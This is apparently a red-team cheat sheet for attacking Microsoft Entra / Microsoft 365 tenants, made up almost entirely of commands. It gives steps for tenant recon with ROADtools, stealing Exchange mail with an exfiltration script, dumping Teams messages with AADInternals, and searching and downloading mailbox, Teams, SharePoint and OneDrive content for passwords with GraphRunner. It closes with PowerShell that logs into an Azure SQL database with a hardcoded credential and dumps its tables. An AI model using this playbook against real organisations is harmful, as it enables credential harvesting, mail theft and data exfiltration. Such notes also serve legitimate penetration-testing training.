General Recon
Gather info about Entra with ROADtools https://github.com/dirkjanm/ROADtools
roadrecon gather
Determine if tenant is using Teams, Outlook, SharePoint.
Get-MgUserLicenseDetail -UserId "user.one@domain.com"
If “O365_BUSINESS_ESSENTIALS” then YES!
Stealing Exchange email https://github.com/rootsecdev/Azure-Red-Team/blob/master/Tokens/exfil_exchange_mail.py
Add access token to script and run.
python3 exfil_exchange_mail.py
GraphRunner https://github.com/dafthack/GraphRunner/
Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 40
MSTeams
Stealing Teams messages https://github.com/Gerenios/AADInternals
Import-Module ./AADInternals.psm1
Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token | fl id,content,deletiontime,*type*,DisplayName
GraphRunner https://github.com/dafthack/GraphRunner/
Invoke-SearchTeams -Tokens $tokens -SearchTerm password
SharePoint & OneDrive
Searching for creds GraphRunner https://github.com/dafthack/GraphRunner/
Get-GraphTokens
Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm password
GraphRunner will ask if you’d like to download the files it finds.
SQL
Connect
$conn = New-Object System.Data.SqlClient.SqlConnection
$password='$reporting$123'
$conn.ConnectionString = "Server=mbt-finance.database.windows.net;Database=Finance;User ID=financereports;Password=$password;"
$conn.Open()
Enum
$sqlcmd = $conn.CreateCommand()
$sqlcmd.Connection = $conn
$query = "SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE';"
$sqlcmd.CommandText = $query
$adp = New-Object System.Data.SqlClient.SqlDataAdapter $sqlcmd
$data = New-Object System.Data.DataSet
$adp.Fill($data) | Out-Null
$data.Tables
Query
$sqlcmd = $conn.CreateCommand()
$sqlcmd.Connection = $conn
$query = "SELECT * FROM Subscribers;"
$sqlcmd.CommandText = $query
$adp = New-Object System.Data.SqlClient.SqlDataAdapter $sqlcmd
$data = New-Object System.Data.DataSet
$adp.Fill($data) | Out-Null
$data.Tables | ft